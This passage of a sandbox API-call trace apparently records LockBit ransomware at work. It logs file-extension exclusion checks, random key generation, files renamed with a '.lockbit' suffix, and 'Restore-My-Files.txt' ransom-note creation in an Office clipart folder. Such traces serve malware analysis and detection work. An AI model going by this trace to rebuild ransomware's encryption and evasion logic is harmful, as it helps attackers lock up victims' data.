-1 [0176.312] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.312] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.312] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.312] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.312] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.312] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.312] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.312] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.312] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.312] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.312] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.313] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.313] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01568_.WMF.lockbit") returned 72 [0176.313] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01568_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01568_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0176.315] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.315] malloc (_Size=0x40068) returned 0x3f70048 [0176.315] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=21680) returned 1 [0176.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0176.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0176.316] ReadFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0176.321] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01568_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01568_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.321] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.321] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.322] free (_Block=0x1fa2ed8) [0176.322] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01568_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.322] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.323] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.323] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbcb57400, ftCreationTime.dwHighDateTime=0x1bf323f, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbcb57400, ftLastWriteTime.dwHighDateTime=0x1bf323f, nFileSizeHigh=0x0, nFileSizeLow=0x47a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01569_.WMF", cAlternateFileName="")) returned 1 [0176.323] lstrcmpiW (lpString1=".", lpString2="SO01569_.WMF") returned -1 [0176.323] lstrcmpiW (lpString1="..", lpString2="SO01569_.WMF") returned -1 [0176.323] PathFindExtensionW (pszPath="SO01569_.WMF") returned=".WMF" [0176.323] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.323] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.323] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.323] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.323] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.323] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.323] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.323] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.323] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.323] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.323] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.323] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.323] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.324] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.324] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.325] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01569_.WMF") returned -1 [0176.325] lstrcmpiW (lpString1="ntldr", lpString2="SO01569_.WMF") returned -1 [0176.325] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01569_.WMF") returned -1 [0176.325] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01569_.WMF") returned -1 [0176.325] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01569_.WMF") returned -1 [0176.325] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01569_.WMF") returned 1 [0176.325] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01569_.WMF") returned -1 [0176.325] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.326] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01569_.WMF") returned=".WMF" [0176.326] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.326] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.326] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.327] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.327] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.327] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.327] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.327] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.327] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.327] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.327] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.327] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01569_.WMF.lockbit") returned 72 [0176.327] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01569_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01569_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0176.336] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.336] malloc (_Size=0x40068) returned 0x3e70008 [0176.336] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=18336) returned 1 [0176.336] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.336] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0176.336] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.337] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0176.337] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0176.339] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01569_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01569_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.340] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.340] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.341] free (_Block=0x1fa2ed8) [0176.342] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01569_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.342] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.342] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.342] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd5f9e00, ftCreationTime.dwHighDateTime=0x1bd4adf, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xcd5f9e00, ftLastWriteTime.dwHighDateTime=0x1bd4adf, nFileSizeHigh=0x0, nFileSizeLow=0xa8a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01575_.WMF", cAlternateFileName="")) returned 1 [0176.342] lstrcmpiW (lpString1=".", lpString2="SO01575_.WMF") returned -1 [0176.342] lstrcmpiW (lpString1="..", lpString2="SO01575_.WMF") returned -1 [0176.342] PathFindExtensionW (pszPath="SO01575_.WMF") returned=".WMF" [0176.342] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.342] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.342] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.342] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.342] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.342] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.342] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.342] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0176.342] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0176.342] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0176.342] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0176.343] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0176.343] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0176.344] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO01575_.WMF") returned -1 [0176.344] lstrcmpiW (lpString1="ntldr", lpString2="SO01575_.WMF") returned -1 [0176.344] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO01575_.WMF") returned -1 [0176.344] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO01575_.WMF") returned -1 [0176.344] lstrcmpiW (lpString1="autorun.inf", lpString2="SO01575_.WMF") returned -1 [0176.344] lstrcmpiW (lpString1="thumbs.db", lpString2="SO01575_.WMF") returned 1 [0176.344] lstrcmpiW (lpString1="iconcache.db", lpString2="SO01575_.WMF") returned -1 [0176.344] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0176.345] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01575_.WMF") returned=".WMF" [0176.345] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0176.345] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0176.345] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0176.346] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0176.346] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0176.346] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0176.346] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0176.346] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0176.346] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0176.346] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0176.346] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0176.346] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01575_.WMF.lockbit") returned 72 [0176.346] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01575_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01575_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0176.347] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0176.347] malloc (_Size=0x40068) returned 0x1ff1e60 [0176.347] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=43174) returned 1 [0176.348] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.348] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0176.348] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0176.349] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0176.349] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0176.349] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0176.369] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01575_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01575_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0176.369] malloc (_Size=0xa6) returned 0x1fa2ed8 [0176.369] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0176.371] free (_Block=0x1fa2ed8) [0176.371] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01575_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0176.371] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0176.371] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0176.371] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd892e800, ftCreationTime.dwHighDateTime=0x1bd4b38, ftLastAccessTime.dwLowDateTime=0x5aa64dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd892e800, ftLastWriteTime.dwHighDateTime=0x1bd4b38, nFileSizeHigh=0x0, nFileSizeLow=0x2566, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO01777_.WMF", cAlternateFileName="")) returned 1 [0176.371] lstrcmpiW (lpString1=".", lpString2="SO01777_.WMF") returned -1 [0176.371] lstrcmpiW (lpString1="..", lpString2="SO01777_.WMF") returned -1 [0176.371] PathFindExtensionW (pszPath="SO01777_.WMF") returned=".WMF" [0176.371] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0176.371] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0176.371] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0176.371] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0176.371] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0176.371] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0176.371] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0176.371] 